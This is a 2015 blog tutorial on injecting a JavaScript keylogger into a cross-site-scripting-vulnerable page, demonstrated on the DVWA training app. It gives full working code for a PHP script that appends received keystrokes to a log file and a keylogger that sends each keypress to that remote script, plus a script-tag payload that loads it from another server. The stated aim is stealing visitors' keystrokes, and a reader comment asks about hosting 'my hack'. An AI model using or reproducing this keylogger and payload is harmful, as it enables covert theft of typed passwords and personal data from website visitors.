Sunday, 16 August 2015

How to inject keylogger on website via XSS | Rahul Tyagi

Dear Friends, in this tute we will learn how to install a javascript based keylogger on xss vulnerable website to steal the keystrokes for the same of the visitor.

Cross-Site Scripting (XSS): Vulnerabilities are a type of computer security vulnerability typically found in Web applications. XSS vulnerabilities enable attackers to inject client-side script into Web pages viewed by other users. Source : Wikipedia

Requirements
------------
1. Xss Vulnerable Page
2. PHP Script 
3. Javascript based keylogger


XSS Vulnerabile Website
-----------------------

So lets first talk about the vulnerable website. We are taking DVWA's XSS vulnerable section as an example.

Step 1: Start your DVWA : http://127.0.0.1/dvwa/

Step 2: Now go to security section first and set security level to LOW as shown in below image.


 Step 3: Now Click on XSS Reflected and execute your payload  <script>alert(0)</script> to check the xss.

As you can see the text box is not validating our request and as a result we are able to execute our javascript. Now we have assured that the website is vulnerable to Cross Site Scripting attack.
Now lets make a javascript based keylogger with extension .js.

PHP File Code : Required to Save the Logs
-----------------------------------------
Note : Name file as keylogger.php and upload on the server for later access.

<?php
$key=$_POST['key'];
$logfile="keylog.txt";
$fp = fopen($logfile, "a");
fwrite($fp, $key);
fclose($fp);
?>


As you can see above our php file with $key variable will recieve the keystrokes coming from POST method and it will open a file named as keylog.txt in append mode, after opening it will write every keystroke which is going to be pressed by the infected page user.

Java Script Keylogger Code
--------------------------

    document.onkeypress = function(evt) {
       evt = evt || window.event
       key = String.fromCharCode(evt.charCode)
       if (key) {
          var http = new XMLHttpRequest();
          var param = encodeURI(key)
          http.open("POST","YOUR .php file path",true);
          http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
          http.send("key="+param);

       }
    }


 Here we have the .js file ready to fire as you can see below.










 
Payload & Exploit
-----------------
I have uploaded the keylogger.js file on my xampp server along with php file.


Payload : <script src="http://192.168.1.45/keylogger/keylogger.js">
Just add thsi payload in the text box and execute this java script. After execution of the script you will see in ur server automatically one new keylog.txt will be created and as you type anything on the page will be captured andd save in the text file.



*Here my xampp server's IP address is 192.168.1.45 on which DVWA is hosted.



  • Stumble This
  • Fav This With Technorati
  • Add To Del.icio.us
  • Digg This
  • Add To Facebook
  • Add To Yahoo

3 comments:

Abhishek Joshi said...
This comment has been removed by the author.
Unknown said...

are there any free servers i can use to host my hack?

QP Tester said...

You have to finish off the payload with < / script > (without the spaces) or it won't work.

Post a Comment